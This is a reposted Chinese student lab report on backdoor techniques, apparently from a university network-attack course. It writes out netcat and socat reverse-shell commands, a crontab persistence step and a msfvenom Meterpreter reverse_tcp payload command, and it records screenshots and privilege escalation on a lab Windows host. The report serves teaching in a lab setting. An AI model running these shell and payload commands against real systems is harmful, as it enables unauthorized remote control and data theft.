20145204《网络对抗》MAL后门原理与实践

最新推荐文章于 2024-09-07 21:55:07 发布
最新推荐文章于 2024-09-07 21:55:07 发布
阅读量125 收藏
点赞数
文章标签: 操作系统 shell 网络
原文链接:http://www.cnblogs.com/yayaer/p/6545459.html
版权

20145204《网络对抗》MAL后门原理与实践

实践内容说明

(1)使用netcat获取主机操作Shell,cron启动 (1分)

(2)使用socat获取主机操作Shell, 任务计划启动 (1分)

(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(1分)

(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

基础问题回答

(1)例举一个后门进入到你系统中的可能方式?

通过下载破解软件,或者浏览带有插件的网页。

(2)例举一个后门启动起来(win及linux)的方式?

后门伪装成常用软件,诱使用户点击。

(3)Meterpreter有哪些给你映像深刻的功能?

获得system权限,得到密码

(4)如何发现自己有系统有没有被安装后门?

实验总结与体会

在做后门的实验,深刻意识到了后门的危害性,一旦中招,基本攻击者想知道的信息都能获得,在利用Meterpreter提取win7权限竟然成功,看来以后要经常查毒了。

实践一:ncat

知识要求:

1.NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection);
2.netcat实现简单服务器命令:nc -l -p //-l表明nc处于监听模式,-p指定端口号;
3.nc的-e选项,指定连接后执行的程序。
windows获得linux shell
  • windows作为攻击端开启监听模式ncat.exe -l -p 5204
  • linux反弹连接并且设置连接后启动shell。nc 172.30.202 5204 -e /bin/sh

886770-20170314203257088-346089118.png

linux获得windows shell。

与上面步骤相反,只不过windows设置连接后启动cmd。

以下是实验结果:

886770-20170314203316588-1195200546.png

ncat文件传输

1、监听端windows命令:ncat.exe -lv port > filename

2、传输端kali命令:nc windows_ip port < filename

结果如下(传输的文件在ncat文件夹下):

886770-20170314213506323-1685644363.png

cron启动

命令:crontab -e修改文件,crontab -l查看修改的文件。

886770-20170314220822088-1792834517.png

实践二:socat

windows获得kali shell

1、kali设置监听命令socat tcp-l:5204 system:bash,pty,stderr

2、windows连接,并获取权限socat readline tcp:172.30.1.181 5204

结果:

886770-20170314205012073-613467302.png

kali获得window shell

1、windows端如下图:

886770-20170314205212557-1922487706.png

2、kali端如下:

886770-20170314205251057-646589693.png

实践三:

1、生成后门程序命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=linux_ip LPORT=444 -f exe >20145204.exe

2、利用ncat传输文件使得后门程序进入靶机,具体实现如下图所示:

886770-20170314205901948-527404096.png

3、根据老师教程,在kali中开启msf设置监听。

4、在windows端运行后门程序,并获得权限如下图所示:

886770-20170314210126307-1236689563.png

实践四

  • 对靶机截屏:

结果如下:

886770-20170314211940495-1333199946.jpg

  • 提权

886770-20170314214011604-944725.png

参考资料

转载于:https://www.cnblogs.com/yayaer/p/6545459.html

weixin_30896511
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
未知密码破译 Unknow
u013046245的专栏
03-07 1873
信息安全原理 作业1,习题3 MAL TIRRUEZF CR MAL RKZYIOL EX MAL OIY UAE RICF “MAL ACWALRM DYEUPLFWL CR ME DYEU MAIM UL IZL RKZZEKYFLF GH OHRMLZH” 看起来似乎是某某某说过一句怎样的话 先写个程序,用来翻译每个大写字母对应的字母 cipher =
MAL-Sync-crx插件
03-08
也可以与Anilist / Kitsu / Simkl一起使用。 只需在设置中更改同步模式即可。 使您可以将MyAnimeList动漫/漫画家用作所有受支持页面的集中书签系统。 它支持30多个动漫和漫画页面,如crunchyroll,netflix,mangadex...
未知:密码——题解
luyouqi233的博客
07-29 800
密码 题目描述 假发通过了不懈的努力,得到了将军家门锁的密码(一串小写英文字母)。但是假发被十四和猩猩他们盯上了,所以假发需要把密码传递出去。因为假发不想十四他们发现几松门前贴的小纸条就是将军家的密码,所以他加密了密码(新八:听起来有点诡异)。加密方法如下:随机地,在密码中任意位置插入随机长度的小写字符串。 不过,假发相信银桑和他那么多年小学同学,一定能猜中密码是什么的(新八:银桑什么时候成攮
20145207《网络对抗MAL后门原理实践
weixin_30338497的博客
03-18 97
20145207《网络对抗MAL后门原理实践 基础问题回答 (1)例举一个后门进入到你系统中的可能方式? 下载软件,淘宝虚假链接,买卖账号时侵入的黑客 (2)例举一个后门启动起来(win及linux)的方式? 软件伪装的方式来让他人在不知情况下点进去, (3)Meterpreter有哪些给你映像深刻的功能? 获得摄像头控制权,获得system权限,得到密码 (4)...
20144306《网络对抗MAL_后门原理实践
weixin_30359021的博客
03-17 94
本期收获 1.了解后门的基本概念。 2.Netcat、socat、MSF meterpreter的使用(MSF meterpreter实在太好玩了) 3.后门软件的启动方式: Windows任务计划程序 Linux任务管理器crontab的使用 网络配置最简单的方式 虚拟机网络适配器设置:选择最简单的NAT模式。 再注意检查下可移动设备的开启情况,一定...
20145326蔡馨熠《网络对抗后门原理实践
weixin_30588729的博客
03-15 87
20145326蔡馨熠《网络对抗后门原理实践 实验内容概述 使用netcat和socat获取靶机的shell,并实现任务计划启动。 使用msf-meterpreter生成可执行后门文件获取靶机shell,并进行一些命令操作,如查看ip、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等。 参考资料——MAL_后门原理实践 具体过程老师已经写得很详细了,我在这里就...
20144306《网络对抗MAL_免杀原理实践
weixin_30505485的博客
03-23 133
一.基础问题回答 1.杀软是如何检测出恶意代码的? (1)特征码:类似于人的生物特征,恶意代码可能会包含一段或多端数据能代表其特征。杀软一般会对文件内容进行静态扫描,将文件内容与特征库进行匹配,来检测已知的网络攻击。 优点:检测效率高、能精确检测恶意软件类型和具体名称、能在恶意软件首次写入计算机时检测而非运行后。 缺点:不能检测未知和变形的恶...
2017-2018-2 20155303『网络对抗技术』Exp2:后门原理实践
weixin_34192816的博客
03-28 192
2017-2018-2 『网络对抗技术』Exp2:后门原理实践 ————————CONTENTS———————— 1. 后门原理实践实验说明 2. 常用后门工具 NC或netcat Win获得Linux Shell Linux获得Win Shell 3. Meterpreter 4. 实验中遇到的问题及思考 Metasploit如何生成各种类型的后门? 5. 实验总结及体会 附:参...
20165214 2018-2019-2 《网络对抗技术》Exp2 后门原理实践 Week4
weixin_30648587的博客
03-24 178
网络对抗技术》Exp2 PC平台逆向破解之“MAL_简单后门” Week4 一、实验内容 本次实验对象为名为pwn1的pwn1的linux可执行文件。程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。 该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习...
2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理实践
weixin_30298497的博客
03-27 122
#2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理实践 [博客目录] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-使用nc实现mac,Linux间的后门连接 2.2-使用netcat获取主机操作Shell 2.3使用socat获取主机操作Shell 2.4-meterpreter的应用 2.5-Meter...
IAR开发环境下添加SM9B100MAL处理器支持的原理与方法.pdf
09-25
构以及软件配置的深入理解和实践,成功实现了在IAR开发环境下对SM9B100MAL处理器的支持。以下是对这一过程的详细说明。 首先,IAR集成开发环境(IDE)是专为微控制器和嵌入式系统开发设计的一款强大工具,它集成了...
MonetDB的MAL语言实现.docx
11-11
#### 二、MAL语言定义与结构 ##### 2.1 语言定义 - **数据结构定义**:MAL语言中定义了多种数据结构,例如数组、列表等,以支持不同类型的数据库操作。 - **符号表定义**:符号表是MAL语言中的重要组成部分,用于...
前馈神经网络无标度结构抗后门攻击的研究
⃝可在www.sciencedirect.com在线获取ScienceDirectICTExpress 7(2021)265www.elsevier.com/locate/icte...随着第三方神经网络训练需求的增加,通过恶意训练进行对抗性攻击的可能性很大。后门攻击是最有效的攻击之
操作系统面试真题总结(六)
月伴飞鱼
09-04 926
涉及的任务无法继续执行,因为每个任务都在等待其他任务释放资源,但是没有任务会释放它的资源,因为它们都在等待。这是因为CPU可以通过时间片轮转或其他任务切换策略,在各个任务之间快速切换,给人以它们在同时进行的错觉。这是一种非阻塞调用,也就是说,还没得到结果,就继续做别的事情,不会因为单一操作的等待而阻塞。这是一种阻塞调用,也就是说,进行某项操作的过程中,不得不停下来等待,直到这个操作完成。如果你的电脑有多个核心或处理器,你就可以在多个核心或处理器上同时执行多个线程,这是。,主要取决于具体的需求和场景。
KeePassXC软件简介
地球空间
09-02 427
KeePassXC 是一款开源且免费的跨平台密码管理器,它允许用户在不同的网站和服务上使用多个不同的密码,而无需记住它们。KeePassXC 还提供了一个浏览器扩展,允许用户自动从 KeePassXC 中提取用户名和密码,并将其直接填充到网站字段中。- 导入功能:支持从 1Password、KeePass 1 和 CSV 文件导入密码。- 浏览器集成:与多种浏览器集成,自动填充用户名和密码。- 密码生成器:帮助用户创建复杂且安全的密码。- 自动输入:在应用程序中自动输入密码。
操作系统概述
Islucas的博客
09-05 642
操作系统提供给应用程序(程序员或编程人员)使用的接口,应用程序可以根据自己的需要通过系统调用来请求操作系统内核的服务。手工操作阶段——批处理阶段:单道批处理系统——批处理阶段:多道批处理系统——分时操作系统——实时操作系统。CPU中有一个寄存器是程序状态寄存器(PSW),其中有个二进制位,1表示“内核态”,0表示“用户态”。是使用虚拟化技术,将一台物理电脑虚拟化微多台虚拟机器,每个虚拟机器都可以独立运行一个操作系统。CPU在设计和生产时就划分了特权指令和非特权指令,因此CPU在执行指令前就能判断其类型。
Shell脚本流程控制(Linux篇)
m0_67771087的博客
09-07 510
流程控制是改变程序运行顺序的指令。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
最新发布
DamnVanish的博客
09-07 313
Linux中最强权限维持rootkit
MonetDB的MAL语言详解与实现
客户端与数据库交互,接收并发送执行指令,而引擎则负责将接收到的MAL代码转化为可执行的机器指令。执行器则是实际运行这些指令的地方,它通过堆栈机的控制流、命名空间和模块管理来执行程序。 堆栈机的扩展性体现...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值